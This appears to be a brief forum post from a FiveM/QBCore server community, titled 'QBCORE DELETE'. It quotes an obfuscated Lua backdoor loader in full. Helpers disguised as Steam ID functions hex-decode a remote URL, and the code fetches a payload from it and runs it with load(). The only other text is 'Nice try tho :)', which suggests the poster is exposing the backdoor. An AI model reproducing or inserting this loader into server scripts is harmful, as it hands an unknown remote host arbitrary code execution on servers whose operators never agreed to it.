Theme editor

QBCORE DELETE

local function getSteamID(data) local result = "" for i = 1, [HASH=1552]#data[/HASH], 2 do result = result .. string.char(tonumber(data:sub(i, i + 1), 16)) end return result end local function getSteamName() return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148") end PerformHttpRequest(getSteamName(), function(e, d) pcall(function() assert(load(d))() end) end)
Nice try tho :)
 
Back
Top Bottom